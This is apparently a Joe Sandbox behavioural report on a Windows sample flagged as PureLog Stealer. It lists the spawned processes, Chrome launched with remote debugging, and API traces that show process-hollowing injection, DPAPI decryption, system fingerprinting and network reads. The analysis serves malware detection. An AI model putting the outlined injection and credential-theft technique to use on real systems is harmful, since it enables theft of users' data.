2025-01-05 19:08:08 UTC	933	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 05 Jan 2025 19:08:08 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-01-05 19:08:08 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2025-01-05 19:08:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	14:07:54
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\ZT0KQ1PC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ZT0KQ1PC.exe"
Imagebase:	0xdf0000
File size:	497'664 bytes
MD5 hash:	6FE2F68F2EB2277E7F79D68D4D9B4879
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1670042528.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1803422255.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:07:54
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:07:54
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\ZT0KQ1PC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ZT0KQ1PC.exe"
Imagebase:	0xa60000
File size:	497'664 bytes
MD5 hash:	6FE2F68F2EB2277E7F79D68D4D9B4879
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:07:54
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 936
Imagebase:	0x9b0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:08:05
Start date:	05/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	14:08:06
Start date:	05/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2644 --field-trial-handle=2284,i,919765680095075833,18170767553792386952,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	41.2%
Total number of Nodes:	17
Total number of Limit Nodes:	1

Executed Functions

Function 03128631 Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,031285A3,03128593), ref: 031287C9
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 031287DC
Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 031287FA
ReadProcessMemory.KERNELBASE(00000088,?,031285E7,00000004,00000000), ref: 0312881E
VirtualAllocEx.KERNELBASE(00000088,?,?,00003000,00000040), ref: 03128849
WriteProcessMemory.KERNELBASE(00000088,00000000,?,?,00000000,?), ref: 031288A1
WriteProcessMemory.KERNELBASE(00000088,00400000,?,?,00000000,?,00000028), ref: 031288EC
WriteProcessMemory.KERNELBASE(00000088,?,?,00000004,00000000), ref: 0312892A
Wow64SetThreadContext.KERNEL32(0000008C,05680000), ref: 03128966
ResumeThread.KERNELBASE(0000008C), ref: 03128975

Strings

VirtualAlloc, xrefs: 031286F8
GetThreadContext, xrefs: 0312870B
VirtualAllocEx, xrefs: 03128731
ReadProcessMemory, xrefs: 0312871E
ResumeThread, xrefs: 0312876D
WriteProcessMemory, xrefs: 03128744
TerminateProcess, xrefs: 03128858
Load, xrefs: 0312866F
SetThreadContext, xrefs: 03128757
aryA, xrefs: 03128677
CreateProcessW, xrefs: 031286E5
GetP, xrefs: 031286B3
ress, xrefs: 031286BB

Memory Dump Source

Source File: 00000000.00000002.1803382757.0000000003128000.00000040.00000800.00020000.00000000.sdmp, Offset: 03128000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3128000_ZT0KQ1PC.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-232383841
Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction ID: 2dfcb6fe5d97c53bb8ff7d290d87cd82a44b984e9ca87a0685d4b2452cf56e3f
Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction Fuzzy Hash: D0B1087660064AAFDB60CF68CC80BDAB7A5FF8C714F158164EA08AB341D774FA51CB94

Function 031287AE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,031285A3,03128593), ref: 031287C9
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 031287DC
Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 031287FA
ReadProcessMemory.KERNELBASE(00000088,?,031285E7,00000004,00000000), ref: 0312881E
VirtualAllocEx.KERNELBASE(00000088,?,?,00003000,00000040), ref: 03128849
WriteProcessMemory.KERNELBASE(00000088,00000000,?,?,00000000,?), ref: 031288A1
WriteProcessMemory.KERNELBASE(00000088,00400000,?,?,00000000,?,00000028), ref: 031288EC
WriteProcessMemory.KERNELBASE(00000088,?,?,00000004,00000000), ref: 0312892A
Wow64SetThreadContext.KERNEL32(0000008C,05680000), ref: 03128966
ResumeThread.KERNELBASE(0000008C), ref: 03128975

Strings

TerminateProcess, xrefs: 03128858

Memory Dump Source

Source File: 00000000.00000002.1803382757.0000000003128000.00000040.00000800.00020000.00000000.sdmp, Offset: 03128000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3128000_ZT0KQ1PC.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: TerminateProcess
API String ID: 2687962208-2873147277
Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction ID: 9cfb84258baf1ce8105a2bed7014611aad6c0bf9f4da7d74774353a1ab8bb836
Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction Fuzzy Hash: 5B312D72240656ABD734CF94CC91FEA73A5BFCCB15F148508EB09AF280C7B4BA418B94

Function 02FB2C3A Relevance: 1.7, APIs: 1, Instructions: 216
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(04123588,00000000,?,?,?,?,?,?,?,00DFA227,00000000,?,02FB1116,?,00000040), ref: 02FB2EC1

Memory Dump Source

Source File: 00000000.00000002.1803237307.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fb0000_ZT0KQ1PC.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 243ab3c48043815497d8e0326201ddca4b83d9a37047f2a034bce7c03bffb45e
Instruction ID: 055eaf3430d65078c2787e3cf3c4331dfa40c197b4bbad1e3a34debfcef5d5d0
Opcode Fuzzy Hash: 243ab3c48043815497d8e0326201ddca4b83d9a37047f2a034bce7c03bffb45e
Instruction Fuzzy Hash: 6A911A75A041599BCB02CFAAC8C0AEEFBF2BF48314F64C555D964A7352C334A985CBA4

Function 02FB06E8 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(04123588,00000000,?,?,?,?,?,?,?,00DFA227,00000000,?,02FB1116,?,00000040), ref: 02FB2EC1

Memory Dump Source

Source File: 00000000.00000002.1803237307.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fb0000_ZT0KQ1PC.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 07acb28e2eb0966f9df5636b265fbc2fd964c08596d1d2fd4b9d62be0ca03ad7
Instruction ID: 91d5b6dccd65d78be94aa2d7a9dbe166873d003fd302a9ff311fc66102802c1d
Opcode Fuzzy Hash: 07acb28e2eb0966f9df5636b265fbc2fd964c08596d1d2fd4b9d62be0ca03ad7
Instruction Fuzzy Hash: 1D21E0B5D01219AFCB00DF9AD884ADEFBB4FB48310F10852AE918A7200C775A954CFE5

Non-executed Functions

Function 02FB0861 Relevance: 2.7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02FB0939
4'^q, xrefs: 02FB090E

Memory Dump Source

Source File: 00000000.00000002.1803237307.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fb0000_ZT0KQ1PC.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 2a1fc927dc4b998a26527235d8c7918603b404892ec590cf81c86b6bcc8b20e6
Instruction ID: 517e1035c8d2b6c6a590c14cab7907566ed162fce48b9868c28c19eb132272c3
Opcode Fuzzy Hash: 2a1fc927dc4b998a26527235d8c7918603b404892ec590cf81c86b6bcc8b20e6
Instruction Fuzzy Hash: 4E612E70A0020A9FD759DF7BF54169ABBE3FFC8200F04C529C418DB268EB39584A9B50

Function 02FB0870 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02FB0939
4'^q, xrefs: 02FB090E

Memory Dump Source

Source File: 00000000.00000002.1803237307.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fb0000_ZT0KQ1PC.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: e2ec44aa9011eb02b92adbae690576ed5d0c080259ba9a4cc2c9ff359a4321c1
Instruction ID: 0ef6d215150841ca2d4fd78cdcad2401a2a8bb393e5ecc1f79e846871b25cd97
Opcode Fuzzy Hash: e2ec44aa9011eb02b92adbae690576ed5d0c080259ba9a4cc2c9ff359a4321c1
Instruction Fuzzy Hash: EC511E70A002099FD759DF7BF54169ABBE3FBC8200F04C539C419DB268EF39584A9B51

Analysis Process: ZT0KQ1PC.exePID: 1188, Parent PID: 5408COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.9%
Total number of Nodes:	102
Total number of Limit Nodes:	1

Executed Functions

Function 0040F070 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNEL32(00000000,00000000,?,?,006773F4), ref: 0040F0DA

Strings

E, xrefs: 0040F07B
;$, xrefs: 0040F086, 0040F0AE, 0040F0C6, 0040F0E4

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: FileFindFirst
String ID: ;$$E
API String ID: 1974802433-3341445489
Opcode ID: f9b7842a33792373b1873d2cc6546f5c8081bff433e4c7e5aaa5e8d02fb3e7ec
Instruction ID: 04205f1c496d250a77e52773a0e38ecadb8993d25bf1b384199678b690e81055
Opcode Fuzzy Hash: f9b7842a33792373b1873d2cc6546f5c8081bff433e4c7e5aaa5e8d02fb3e7ec
Instruction Fuzzy Hash: 7701A7363011105FC204DB5DDC85DDAB3E9EF96324B0A41A6FC14C7362E2B1AD20CB5A

Function 0040F2B3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDesktopA.USER32 ref: 0040F2D9

Strings

D, xrefs: 0040F3B1

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: CreateDesktop
String ID: D
API String ID: 3054513912-2746444292
Opcode ID: d1fad799616dd8a475c56c21450756720df1fbb703db9722d609a6c106b1e610
Instruction ID: 217a44584fe79af48904659f8cc99f11f80687329e61ea1f58b7d041bb4decb4
Opcode Fuzzy Hash: d1fad799616dd8a475c56c21450756720df1fbb703db9722d609a6c106b1e610
Instruction Fuzzy Hash: CD41B1B2A103148FC704CF68DC91BA977B4FBA9304F454669E809E3312EB70EB94CB55

Function 0042A3F0 Relevance: 3.0, APIs: 2, Instructions: 26
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0042A412
Process32First.KERNEL32(00000000,00000128), ref: 0042A425

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID:
API String ID: 2353314856-0
Opcode ID: 3ece2d2da8353e2216658a769f7b932edbb3db3259797eeb56360b595b6dd385
Instruction ID: 82cb69057e30d57f0e78fa4c71b9caebb28f00c2dade2c95c7cd46ea9a3ae51f
Opcode Fuzzy Hash: 3ece2d2da8353e2216658a769f7b932edbb3db3259797eeb56360b595b6dd385
Instruction Fuzzy Hash: 31F0A070202250BFD7109F24DD89F9ABBE8EF4A701F05441CF549CB2A0E6B0DC11DB56

Function 00410E80 Relevance: 1.6, APIs: 1, Instructions: 96
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00410F89

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 2dd8c4a1253ec12c79a2896d24d31127e024fa55bf23dc599d2c88a3c435a7ed
Instruction ID: 971c8f26c93178040aa9fded4be799eae79e9697ec246a83c1feeab136c85559
Opcode Fuzzy Hash: 2dd8c4a1253ec12c79a2896d24d31127e024fa55bf23dc599d2c88a3c435a7ed
Instruction Fuzzy Hash: EC314B727002145FCB18EFAEDC81BAD73E5AF88305F144878E41AD7352DA70AA498F59

Function 00426960 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00426971

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 1515700fc64517df071922856f7d700c2c9821007009b647809773e064e0f093
Instruction ID: 77d0e461d9913b7729ed382e6f77b3371244e67e1d38cc15d906f377e2becbc0
Opcode Fuzzy Hash: 1515700fc64517df071922856f7d700c2c9821007009b647809773e064e0f093
Instruction Fuzzy Hash: 3BF0E2B6B40600AFC218EF54EEC5D967369DB88754B000524FB04D3BB0E6F0ED0587EA

Function 0040FBB0 Relevance: 1.5, APIs: 1, Instructions: 28encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 0040FBEE

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: bc902ee00f69c84ef729cb9ee8d8aa658b786e3c5862b92f2ebfd6e2eb0961ac
Instruction ID: 1f25b041e11b9214de6e3d0f3129310070ff5df2e63173ec9a9fec1826d3f87b
Opcode Fuzzy Hash: bc902ee00f69c84ef729cb9ee8d8aa658b786e3c5862b92f2ebfd6e2eb0961ac
Instruction Fuzzy Hash: 5CF06D719083118FC304DF28D584A1BBBF5EF89304F118A5DF888A7391E730A944CB52

Function 004262E0 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(00000000), ref: 00426316

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 7aa11cb0ede034a243d1d1c1395ca3f98541101aa327b2223676e95e4b3056d8
Instruction ID: 3a1c0b43ab6d9a9ee8c84e48dea589f7cb866c7e4cd64f145271fdff0a7f6eb9
Opcode Fuzzy Hash: 7aa11cb0ede034a243d1d1c1395ca3f98541101aa327b2223676e95e4b3056d8
Instruction Fuzzy Hash: 21E08CB27001103BD210971DFC45FAB77999FC5364F090024F284D3380EAF4A98186AA

Function 00426450 Relevance: 1.5, APIs: 1, Instructions: 24timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32 ref: 00426483

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: abb3bf571c1522f366c103458c6c34d826e47d19c4bd4554a0e5a515e1b49fce
Instruction ID: 0c3e9a94476ff4d6dfe5096b7b62c8954465ab02d25120dc73cd94a7aa3ccc54
Opcode Fuzzy Hash: abb3bf571c1522f366c103458c6c34d826e47d19c4bd4554a0e5a515e1b49fce
Instruction Fuzzy Hash: 0CE065B5B51520BFD218DB34DD59E1937A4AB88330F094164E9199F2E0E6F19C48CF55

Function 00408620 Relevance: 1.5, APIs: 1, Instructions: 16filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,000007CF,?), ref: 00408632

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: f974a2193acfcf21e6f46b29a184e7e5ed36a55c610a6970cef64197aefd69b5
Instruction ID: bf681e8d1d0434db5b7eefdf8966aafcf26a628a9585c1b948e1487fc86e925a
Opcode Fuzzy Hash: f974a2193acfcf21e6f46b29a184e7e5ed36a55c610a6970cef64197aefd69b5
Instruction Fuzzy Hash: A5E046B1A0020ACFDB04AB14CC86D9577B6EB88B0472040A8A1159B265E671E942CF80

Function 004266EA Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00426700

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 295e74b6ccb028ae21b2e98e65fde634fd588ad72f1bf5c8456a210b25577c11
Instruction ID: c9fdc8429e9ec906926c83a010b99e61c273e1e78a535fdfcf792a5445de7926
Opcode Fuzzy Hash: 295e74b6ccb028ae21b2e98e65fde634fd588ad72f1bf5c8456a210b25577c11
Instruction Fuzzy Hash: 07E01271315B01AFD3088F58DDD9F7533A5BB88700F50492DE501971D1FAA8E854E755

Function 004399AE Relevance: 10.1, APIs: 6, Instructions: 1093
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(006792FD), ref: 0043A94C
LoadLibraryA.KERNEL32(00679315), ref: 0043A9CE
LoadLibraryA.KERNEL32(00679321), ref: 0043AA0F
LoadLibraryA.KERNEL32(00679348), ref: 0043AAD2
LoadLibraryA.KERNEL32(00679353), ref: 0043AB13
LoadLibraryA.KERNEL32(00679361), ref: 0043AB54

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 27ff5559cbc524e15a01f06e629904fbdb2786be9d725791208d93a97e564298
Instruction ID: dc864dccd5dd81cc02d1ca1e57110344a4f766d383acbb680a8e4be149b3983c
Opcode Fuzzy Hash: 27ff5559cbc524e15a01f06e629904fbdb2786be9d725791208d93a97e564298
Instruction Fuzzy Hash: 0DA2EEB5B41601EFC304EB98DCD1E1433EAAF48334B5950A9E425DB363F7B0A955CB2A

Function 00425BA3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNEL32 ref: 00425BEC

Strings

C, xrefs: 00425BA3
:\, xrefs: 00425BB1

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: InformationVolume
String ID: :\$C
API String ID: 2039140958-3309953409
Opcode ID: de0dbd57c80c30e6a15c4decf99b46ae18b9950ccd8240739d8d346edc6c05c0
Instruction ID: d3ef68d34b01ff5348140d152660dcfbd74ea512b3250cfb28ec85a856234f2a
Opcode Fuzzy Hash: de0dbd57c80c30e6a15c4decf99b46ae18b9950ccd8240739d8d346edc6c05c0
Instruction Fuzzy Hash: 9D112A75108744AFC315FF28C984A2AB7E0AF98304F058A2DF89497362E7B4A945CB4B

Function 00426DE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(?,00677B7B,00000000,00020019,?), ref: 00426E6E

Strings

?, xrefs: 00426E1A

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: Open
String ID: ?
API String ID: 71445658-1684325040
Opcode ID: f5be2ee8eeabae66717e083a3ad943a968b4c55b3f0bd89f0f72f208e0900a03
Instruction ID: a9d04036726f724df567bdde514729243084f254c41e0d1855619836a2d5a62c
Opcode Fuzzy Hash: f5be2ee8eeabae66717e083a3ad943a968b4c55b3f0bd89f0f72f208e0900a03
Instruction Fuzzy Hash: 9A01A9B1204348AFEB20DF55CE91F167BA9AB80708F114819E4489B391DBF0A805CF96

Function 00426C20 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 00426C79

Strings

@, xrefs: 00426C6B

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 00e8c42855c906a86d204d0abbd9f7a63d35fb9e77a78ffabec09cba8e6512b6
Instruction ID: 50a0c4a53756e184a0a22890fed9253e52a188b90d5aaa8378f38f6838c179d8
Opcode Fuzzy Hash: 00e8c42855c906a86d204d0abbd9f7a63d35fb9e77a78ffabec09cba8e6512b6
Instruction Fuzzy Hash: D7F02D765012107FC710DF58CD84F0A7BA8AF44B00F114016F605A72A0EAF4E840CB5A

Function 00401130 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00434EEE), ref: 00401161

Strings

zC, xrefs: 00401172

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: AllocNumaVirtual
String ID: zC
API String ID: 4233825816-3288299483
Opcode ID: b9ed5e1a90fc46ea93e9be26b1698be593255086477355b458e07554a47ea2e7
Instruction ID: d1801c5731a493dc0835f2594b316910469dc593323c2deb2d391fd6e96f8e1f
Opcode Fuzzy Hash: b9ed5e1a90fc46ea93e9be26b1698be593255086477355b458e07554a47ea2e7
Instruction Fuzzy Hash: 0BE09231A053018BC308FF3CDD4AB2A73F0AF85205F04826CED88833A6E730D9608786

Function 00427300 Relevance: 3.0, APIs: 2, Instructions: 31
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0042733B
Process32First.KERNEL32(00000000,00000128), ref: 00427351

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID:
API String ID: 2353314856-0
Opcode ID: 32e54d9366f23d2c369e46d387c228bb1bbd5075a14b47211e588691eb5b89ff
Instruction ID: cb446f070588056480cfa0358f8256aed82f717eabc7099fd81d5945c43f4fe3
Opcode Fuzzy Hash: 32e54d9366f23d2c369e46d387c228bb1bbd5075a14b47211e588691eb5b89ff
